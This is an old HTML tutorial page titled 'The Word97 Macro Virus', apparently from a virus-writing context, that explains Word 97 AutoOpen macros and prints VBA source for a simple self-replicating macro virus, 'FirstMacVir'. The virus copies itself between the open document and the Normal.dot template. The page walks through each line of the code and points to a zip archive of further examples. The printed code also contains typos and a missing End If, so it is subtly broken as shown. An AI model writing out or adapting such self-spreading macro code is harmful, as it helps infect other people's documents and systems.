<html>

<head>
<title></title>
</head>

<body background="Cement.jpg">

<h1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
The Word97 Macro Virus</h1>

<h4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<font color="#C10000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; How Word97 Works</font></h4>

<p>Word97 bases primaly on macros. You can change near to everything, if you know what for
a macro is used. For example, you want to call a message, on every start of Word:</p>

<p>click on Tools - Macros - Visual Basic Editor</p>

<p>at the project browser click with the right mouse button on Projects(Normal) and select
add module.</p>

<p>dubble click&nbsp; at the modul. You'll see a text area at the left part of the screen.</p>

<p>type the following:</p>

<p>Sub AutoOpen()<br>
MsgBox &quot;Hello&quot;<br>
End Sub</p>

<p>I won't discribe this simple code... you can read it in the help! But you see AutoOpen
will be executed on every start of the Normal.dot. Of course there are many ways to call a
macro on every start. A virus inserts an infection code instead of the message box.</p>

<p>Take a look at the <font color="#FF0000">Exam1.txt</font> in the <a href="Added.zip">Added.zip</a><br>
Here is only a short description:</p>

<p><font color="#1701E4">modul name: FirstMacVir</font><br>
Sub AutoOpen()<br>
VSource=ActiveDocument.FullName<br>
VDestination=NormalTemplate.FulllName<br>
If UCase(ThisDocument.Name)=&quot;NORMAL.DOT&quot; then <br>
VSource= VDestination <br>
VDestination=ActiveDocument.FullName<br>
Application.OrganizerCopy VSource, VDestination &quot;<font color="#1701E4">FirstMacVir</font>&quot;,
wdOrganizerObjectProjectItems<br>
End Sub</p>

<p><font color="#EBE629">VSource is the file, where the virus is</font></p>

<p><font color="#EBE629">VDestination is the file, wich the virus has to infect</font></p>

<p><font color="#EBE629">I use UCase, to catch errors, wich might happen, if the letter
cases are different e.g the normal templates name is &quot;Normal.Dot&quot;<br>
instead &quot;Normal.dot&quot;. </font></p>

<p><font color="#EBE629">Now copy the macro&nbsp; </font><font color="#1701E4">FirstMacVir</font><font
color="#EBE629"> from VSource to VDestination.</font></p>

<p>That's a short and very simple virus.</p>
</body>
</html>
